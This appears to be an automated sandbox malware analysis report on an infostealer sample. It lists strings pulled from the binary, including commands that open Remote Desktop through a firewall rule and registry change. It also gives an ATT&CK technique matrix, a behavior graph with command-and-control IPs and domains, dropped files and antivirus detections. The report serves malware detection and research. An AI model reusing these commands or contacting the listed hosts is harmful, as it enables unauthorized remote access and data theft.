=A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                              Source: Gxtuum.exe, 0000000E.00000000.2667950394.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 0000000E.00000000.2667950394.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                              Source: Gxtuum.exe, 0000000E.00000002.2670334555.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 0000000E.00000002.2670334555.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                              Source: Gxtuum.exe, 0000000F.00000000.2677150593.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: net start termservice
                              Source: Gxtuum.exe, 0000000F.00000000.2677150593.0000000000AF1000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set0e18a2a9dd22cd0f87c9fba7075c3b3948cb35e3030a2b429c6ac414faba9b49d5db2dd0959ced207fdd8b109219bbbcf13cc4BnuvLaE3PBVqOVT9ADDsZd4xdpPq1Wyx8iuwQ3lqOCP6Dotm2E==CWUuM8==JCQibyUryWRpdH==AWLpdH==OXGYOxQwQmEaOD==G78XdOVrOpMV1T==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPwL3XhOU==J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z VONjflsKcJKx9yDEg3xgOTDBJ7HeceRZfD==JqLqN6RhIt9BLIAETHaXFyaxQ4EcJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359JjPw2rLrZxxqPCz8JLzsZUJfe0D=J4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37D QUVwfpMlfIOq jPng359GTby4H1wO1z UThjeJn8TpYxWCXwhx==yZLQRMJOXn0xUXmKGM==MIvtcr==JIZQVr==G4LR00G33rC326G317C3Nqa3N1y32KC330U3OKQ3N1O31LO316332nQ=N7ziZt5ieJoZ05mu y7igHx4N7ziZt5ieJn=N6nmct5ieJn=OHu=OXu=OXy=OXC=I0vmb8==0LHXcuotOz==0LHXcyM4OBZ=O18iOKnpN6Rh2LCu11Dm4qbtA7vYaNVYEKC+EKG+A5rpdNdneqDmzCioxA==5E==yrLraOQ7EU==268ibxwxPlWbdJl=06LvbdVqPCzl1JmxG6LXTdFYd0QcW6aEaCXrXX5i1s==JLzsZUJfeXI9fJuhFZPyUSQeX50dfK3m iW=F1PmcdE=H6vwcxVwf5kWKHmmVc==GZDCVr==JKvrZxEeX5Maf0yuaDm=GKZgdx9wLI5c0j==FZPEBDOtVx9Y1ZoK1ZC6 inYjR==FqbXZxVk2ZWb10x=IqZvdx9sJ6Ztax9xF6ZqbTRtK6brRxVk2ZWb10x=BHuvMqQZQm4VQT==2qy=36y=F6ZrdxVsgFSLg0qqLeDriXxW0Tvj5oItOqZvbJ1i10I9QBqn9ZXs4HFu4PUvDTSrAWQqLJ0rsUfAbT5Y2ZWRNXGu ZDth3lW0S3wGjtk17zqLNRfgJvYKJUm9SW7NnRd3CykGztk00nibdFr2WR xkQHQT9sgJMlfFQZbTDjTjBd2Dvu3XFf3Kbsb 9t16IcfFQEaDLj3X0JrcUMsUeqLJ0rOVR=AWQKC8==E7Dgca0vAqftZn==F6ZrdxVsgFSLg0qqLeDfhIBo0SHj6Hdt1mZ1LOd1gBSdd6yyITXwgHVqNY3mRXI=J5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4S5Yy DXY4YJKNSVnPFFt11rYdxVwWpwk1T==F6ZqcyVY20AF0ZQqN0zgZxVk259gcpix9S7thIFu2ZL36o6241etMKIxQGLTPC6 IR =A1LraNNt2JLkJ5bQVvVL0HESeqyq9jTBg35W2i3uM3NYMIDsbeRwe5o4XZUuaCXi0nlgOS3eI11MKJzMTwxUVXIwV4l=J5bQVvVL0HEmdqGD9YzR4YQsBzzeM3Nw3qbgZONaTpwqcZCJ8TPugHF1MBTrRHNtKqbhZN9HUD==MHqtMuA=GKLjYOVqgIEcfKGu9ifxQmhOOTHx4INY00ZrGKLjYOVqgIEcfKGu9ifxQmlOOTHx4INY00ZrJ4ZDVwdzXnM4VZao iaxg3ZWMB8r4nJt37CdTcRaT6MpepKzaB1jhoNl1YY=JLzsZyVhgHW9dZJ=BnquOH==BnqvM8==BnquN8==BnqvNH==F7LvcdVsgHAScZmpME==Dne32rLrZxxqPCzl107qA6idxrHecTtpdZojKFYrFyangTAexmqjJ BYdZScd6K5FzGeOjYcOCPuAB==ymOdROhngFz=xmqjJ Bw2ZV8xGOjIr==JKZ0ZOJxdJMjdFUqbCW=A0L1ZNNZgJcmdqqA9CnhjTBuOSVx6HNx004rZNQeOXQgdJJlFc==xk==268YdxRtg5V8N0BlITSeRB==27G6cn==2qvrZx9rH6L2Yd9ffpH8VJu 9ZXY2GBuOSrxQXI=BHqtMuAYPWb=BHqtMuAYPmz=BHqtMuAYPmD=BHqtMuAYP5P=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config ter
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting
                              Valid Accounts21
                              Windows Management Instrumentation
                              1
                              Scripting
                              1
                              DLL Side-Loading
                              1
                              Disable or Modify Tools
                              2
                              OS Credential Dumping
                              1
                              System Time Discovery
                              1
                              Remote Desktop Protocol
                              11
                              Archive Collected Data
                              1
                              Web Service
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Native API
                              1
                              DLL Side-Loading
                              1
                              Extra Window Memory Injection
                              11
                              Deobfuscate/Decode Files or Information
                              LSASS Memory23
                              File and Directory Discovery
                              Remote Desktop Protocol1
                              Browser Session Hijacking
                              14
                              Ingress Tool Transfer
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts2
                              Command and Scripting Interpreter
                              1
                              Browser Extensions
                              212
                              Process Injection
                              3
                              Obfuscated Files or Information
                              Security Account Manager248
                              System Information Discovery
                              SMB/Windows Admin Shares41
                              Data from Local System
                              21
                              Encrypted Channel
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts2
                              Scheduled Task/Job
                              2
                              Scheduled Task/Job
                              2
                              Scheduled Task/Job
                              13
                              Software Packing
                              NTDS1
                              Query Registry
                              Distributed Component Object Model1
                              Email Collection
                              1
                              Remote Access Software
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts1
                              PowerShell
                              11
                              Registry Run Keys / Startup Folder
                              11
                              Registry Run Keys / Startup Folder
                              1
                              Timestomp
                              LSA Secrets991
                              Security Software Discovery
                              SSHKeylogging4
                              Non-Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading
                              Cached Domain Credentials13
                              Process Discovery
                              VNCGUI Input Capture115
                              Application Layer Protocol
                              Data Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              File Deletion
                              DCSync361
                              Virtualization/Sandbox Evasion
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Extra Window Memory Injection
                              Proc Filesystem1
                              Application Window Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt123
                              Masquerading
                              /etc/passwd and /etc/shadow1
                              Remote System Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron361
                              Virtualization/Sandbox Evasion
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                              Process Injection
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579386 Sample: file.exe Startdate: 22/12/2024 Architecture: WINDOWS Score: 100 130 api.telegram.org 2->130 132 sweepyribs.lat 2->132 134 10 other IPs or domains 2->134 164 Suricata IDS alerts for network traffic 2->164 166 Found malware configuration 2->166 168 Malicious sample detected (through community Yara rule) 2->168 172 19 other signatures 2->172 10 skotes.exe 4 63 2->10         started        15 file.exe 5 2->15         started        17 142c991362.exe 2->17         started        19 4 other processes 2->19 signatures3 170 Uses the Telegram API (likely for C&C communication) 130->170 process4 dnsIp5 152 185.215.113.43, 49753, 49759, 49785 WHOLESALECONNECTIONSNL Portugal 10->152 154 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->154 156 31.41.244.11, 49765, 49787, 49804 AEROEXPRESS-ASRU Russian Federation 10->156 98 C:\Users\user\AppData\...\cc6b47fc15.exe, PE32 10->98 dropped 100 C:\Users\user\AppData\...\54682ac64c.exe, PE32 10->100 dropped 102 C:\Users\user\AppData\...\2e4e1b8516.exe, PE32 10->102 dropped 114 24 other malicious files 10->114 dropped 212 Creates multiple autostart registry keys 10->212 214 Hides threads from debuggers 10->214 236 2 other signatures 10->236 21 35f0a75b93.exe 10->21         started        26 fed209a298.exe 10->26         started        28 5cda6c90d7.exe 10->28         started        40 9 other processes 10->40 104 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->104 dropped 106 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->106 dropped 216 Detected unpacking (changes PE section rights) 15->216 218 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->218 220 Tries to evade debugger and weak emulator (self modifying code) 15->220 222 Tries to detect virtualization through RDTSC time measurements 15->222 30 skotes.exe 15->30         started        108 C:\Users\...\W5BO33UUYQPDZ9CE875CW1XCH.exe, PE32 17->108 dropped 110 C:\Users\user\...\MSMQUTWP7M2KT78991EY50.exe, PE32 17->110 dropped 224 Query firmware table information (likely to detect VMs) 17->224 226 Tries to harvest and steal ftp login credentials 17->226 228 Tries to harvest and steal browser information (history, passwords, etc) 17->228 230 Tries to steal Crypto Currency Wallets 17->230 158 212.193.31.8, 49846, 49866, 49877 SPD-NETTR Russian Federation 19->158 112 C:\Windows\System32\config\...\output[1].png, PNG 19->112 dropped 232 Creates files in the system32 config directory 19->232 234 Contains functionality to start a terminal service 19->234 32 chrome.exe 19->32         started        34 chrome.exe 19->34         started        36 graph.exe 19->36         started        38 chrome.exe 19->38         started        file6 signatures7 process8 dnsIp9 136 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 21->136 78 C:\Users\user\Documents\DBAEGCGCGI.exe, PE32 21->78 dropped 80 C:\Users\user\AppData\...\softokn3[1].dll, PE32 21->80 dropped 82 C:\Users\user\AppData\Local\...\random[4].exe, PE32 21->82 dropped 90 11 other files (7 malicious) 21->90 dropped 174 Drops PE files to the document folder of the user 21->174 176 Tries to steal Mail credentials (via file / registry access) 21->176 192 6 other signatures 21->192 92 3 other files (1 malicious) 26->92 dropped 178 Multi AV Scanner detection for dropped file 26->178 180 Writes many files with high entropy 26->180 42 cmd.exe 26->42         started        138 cheapptaxysu.click 104.21.67.146, 443, 49823, 49831 CLOUDFLARENETUS United States 28->138 182 Detected unpacking (changes PE section rights) 28->182 184 Query firmware table information (likely to detect VMs) 28->184 194 2 other signatures 28->194 196 3 other signatures 30->196 140 239.255.255.250 unknown Reserved 32->140 46 chrome.exe 32->46         started        49 chrome.exe 34->49         started        142 api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom 40->142 144 fivetk5sb.top 185.121.15.192 REDSERVICIOES Spain 40->144 146 9 other IPs or domains 40->146 84 C:\Users\user\AppData\...\service123.exe, PE32 40->84 dropped 86 C:\Users\user\AppData\Local\...behaviorgraphxtuum.exe, PE32 40->86 dropped 88 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 40->88 dropped 94 10 other malicious files 40->94 dropped 186 Attempt to bypass Chrome Application-Bound Encryption 40->186 188 Contains functionality to start a terminal service 40->188 190 Binary is likely a compiled AutoIt script file 40->190 198 5 other signatures 40->198 51 cd2469328d.exe 40->51         started        53 Gxtuum.exe 40->53         started        55 graph.exe 40->55         started        57 3 other processes 40->57 file10 signatures11 process12 dnsIp13 96 C:\Users\user\AppData\...\file.zip (copy), Zip 42->96 dropped 200 Writes many files with high entropy 42->200 59 7z.exe 42->59         started        63 7z.exe 42->63         started        65 7z.exe 42->65         started        71 9 other processes 42->71 160 www.google.com 142.250.181.132 GOOGLEUS United States 46->160 162 pancakedipyps.click 172.67.209.202, 443, 49806, 49814 CLOUDFLARENETUS United States 51->162 202 Query firmware table information (likely to detect VMs) 51->202 204 Found many strings related to Crypto-Wallets (likely being stolen) 51->204 206 Tries to steal Crypto Currency Wallets 51->206 208 Multi AV Scanner detection for dropped file 53->208 210 Contains functionality to start a terminal service 53->210 67 chrome.exe 55->67         started        69 chrome.exe 55->69         started        file14 signatures15 process16 file17 116 C:\Users\user\AppData\Local\...\file_7.zip, Zip 59->116 dropped 238 Writes many files with high entropy 59->238 118 C:\Users\user\AppData\Local\...\file_6.zip, Zip 63->118 dropped 120 C:\Users\user\AppData\Local\...\file_5.zip, Zip 65->120 dropped 73 chrome.exe 67->73         started        76 chrome.exe 69->76         started        122 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 71->122 dropped 124 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 71->124 dropped 126 C:\Users\user\AppData\Local\...\file_4.zip, Zip 71->126 dropped 128 3 other malicious files 71->128 dropped signatures18 process19 dnsIp20 148 172.217.19.228 GOOGLEUS United States 73->148 150 www.google.com 73->150

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              file.exe58%ReversingLabsWin32.Infostealer.Tinba
                              file.exe60%VirustotalBrowse
                              file.exe100%AviraTR/Crypt.TPM.Gen
                              file.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe100%AviraTR/Crypt.XPACK.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraHEUR/AGEN.1320706
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%AviraTR/ATRAPS.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                              C:\Program Files\Windows Media Player\graph\graph.exe0%ReversingLabs
                              C:\ProgramData\freebl3.dll0%ReversingLabs
                              C:\ProgramData\mozglue.dll0%ReversingLabs
                              C:\ProgramData\msvcp140.dll0%ReversingLabs
                              C:\ProgramData\nss3.dll0%ReversingLabs
                              C:\ProgramData\softokn3.dll0%ReversingLabs
                              C:\ProgramData\vcruntime140.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe22%ReversingLabs
